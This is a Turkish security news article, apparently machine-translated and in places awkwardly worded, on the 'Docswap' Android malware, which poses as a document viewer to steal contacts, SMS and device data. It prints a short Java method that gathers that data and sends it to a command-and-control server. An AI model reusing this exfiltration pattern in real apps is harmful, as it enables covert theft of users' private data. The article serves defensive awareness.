“Docswap” olarak adlandırılan gelişmiş bir kötü amaçlı yazılım kampanyası, kendisini meşru bir belge güvenliği ve görüntüleme uygulaması olarak gizleyerek küresel olarak Android kullanıcılarını hedeflemeyi hedeflemiştir.
Kötü amaçlı yazılım, kullanıcıları bir üretkenlik aracı gibi görünen şeyleri yüklemeye ve kurbanların cihazlarına gizlice devam ederken ve hassas bilgileri ortadan kaldırmaya yönlendirir.
İlk enfeksiyon tipik olarak, sahte belge görüntüleyicisini PDF ve ofis dosyalarını güvenli bir şekilde açmak için bir çözüm olarak tanıtan kimlik avı e -postaları veya tehlikeye atılmış web siteleri aracılığıyla gerçekleşir.
Kurulum üzerine Docswap, kişilere erişim, depolama ve SMS mesajlaşma özellikleri dahil kapsamlı izinler talep eder.
S2W güvenlik analistleri, bir kez yüklendikten sonra, kötü amaçlı yazılımın, standart algılama yöntemlerini atlamak için şifreli bir protokol kullanarak komut ve kontrol sunucularına bir bağlantı kurduğunu kaydetti.
Analizleri, son üç hafta içinde Asya, Avrupa ve Kuzey Amerika’daki enfeksiyonlarda önemli bir artış gösterdi.
Kötü amaçlı yazılım, kötü amaçlı kodunu gizlemek için sofistike bir şaşkınlık tekniği uygular.
Uygulama açıldığında, yükünü arka planda aynı anda yürütürken belge görüntüleme özelliklerini görüntüler, bu da algılamayı özellikle ortalama kullanıcılar için zorlaştırır.
Docswap’ın işlevselliğinin çekirdeği, aşağıdaki kodu yürüten bir ana kütüphaneye dayanır:-
private void exfiltrateData() {
String deviceInfo = getDeviceInfo();
String contactsList = getContacts();
String smsData = getMessages();
new AsyncTask() {
@Override
protected Void doInBackground(Void... params) {
sendToC2Server(encryptData(deviceInfo + contactsList + smsData));
return null;
}
}.execute();
}Saldırı analizi
Kötü amaçlı yazılım, bir damlalık bileşeni ile başlayan çok aşamalı bir enfeksiyon işlemi kullanır. Bu başlangıç yükü iyi huylu görünür, ancak önceden belirlenmiş bir gecikmeden sonra şifrelenen şifreli bir yük içerir.
Bu teknik, güvenlik araştırmacıları tarafından yaygın olarak kullanılan sanal alan analizinden ve dinamik tarama araçlarından kaçmaya yardımcı olur.
Ağ trafiğinin analizi, DOCSWAP’ın meşru HTTPS trafiğini taklit eden özel bir protokol kullanarak öncelikle Doğu Avrupa ve Güneydoğu Asya’da bulunan sunucularla iletişim kurduğunu göstermektedir.
DOCSWAP’ın en ilgili yönü, potansiyel olarak iki faktörlü kimlik doğrulamasını tehlikeye atarak SMS mesajlarını kesme ve iletme yeteneğidir.
Güvenlik uzmanları, şüpheli belge görüntüleme uygulamalarının derhal kaldırılmasını ve saygın antivirüs yazılımı ile tam cihaz taramalarını çalıştırmayı önerir.
Kullanıcılar ayrıca Google Play korumasını etkinleştirmeli ve bilinmeyen kaynaklardan uygulamaları yüklemekten kaçınmalıdır.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.